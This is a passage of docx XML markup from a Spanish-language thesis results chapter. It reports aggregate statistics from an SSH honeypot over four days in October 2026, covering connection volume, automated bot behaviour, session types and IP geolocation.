        <w:t xml:space="preserve">Resultados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este capítulo presenta los resultados de los primeros días de captura, del 4 de octubre de 2026 a las 15:49 UTC (primera conexión hostil, 8 minutos después de exponer el puerto 22) al 7 de octubre a las 16:45 UTC. Son resultados parciales: la captura continúa hasta finales de octubre y el informe de inteligencia final se elaborará con el periodo completo. Las cifras se han obtenido con cowrie_analyzer.py excluyendo las sesiones de prueba del administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Volumen de la Actividad</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366"/>
        <w:gridCol w:w="3572"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexiones (sesiones)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">13 761</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IPs de origen distintas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">499</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Intentos de autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12 748 (10 688 fallidos y 2 060 aceptados)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comandos ejecutados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 657</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ficheros capturados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">654 eventos de 17 ficheros distintos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK identificadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21, en 9 tácticas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 15. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El primer acceso con éxito se produjo a los 26 minutos de la exposición. La media es de unas 3 400 conexiones diarias, repartidas a todas las horas del día. La Figura 5 muestra la actividad por día; el primero y el último son parciales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conexiones diarias registradas por el honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="16478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038725" cy="1647825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Naturaleza Automatizada de los Ataques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 16 clasifica las sesiones según lo que llegó a hacer el atacante.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763"/>
        <w:gridCol w:w="1588"/>
        <w:gridCol w:w="1588"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comportamiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prueba credenciales y no consigue entrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10 509</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">76,4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Se conecta sin intentar autenticarse (escaneo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 192</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8,7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Entra y ejecuta comandos o sube ficheros</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 559</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">11,3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Entra y se desconecta sin hacer nada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">501</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3,6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 16. Clasificación de las sesiones por comportamiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las 501 sesiones que se desconectan tras entrar corresponden a la verificación de credenciales: el bot comprueba que la contraseña funciona y la registra para un uso posterior, posiblemente por otro actor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Origen Geográfico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La geolocalización asigna a cada IP el país de su proveedor, que no tiene por qué coincidir con el del atacante: las IPs observadas pertenecen mayoritariamente a servidores alquilados y a equipos ya comprometidos que forman parte de botnets. Con esa salvedad, la Figura 6 muestra dos patrones opuestos. Países Bajos concentra el 72,7 % de las conexiones con solo 44 IPs, mientras que Estados Unidos (98 IPs) y China (74 IPs) son los países con más atacantes distintos, cada uno con poca actividad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conexiones por país del proveedor de la IP (diez primeros)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="27527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038725" cy="2752725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
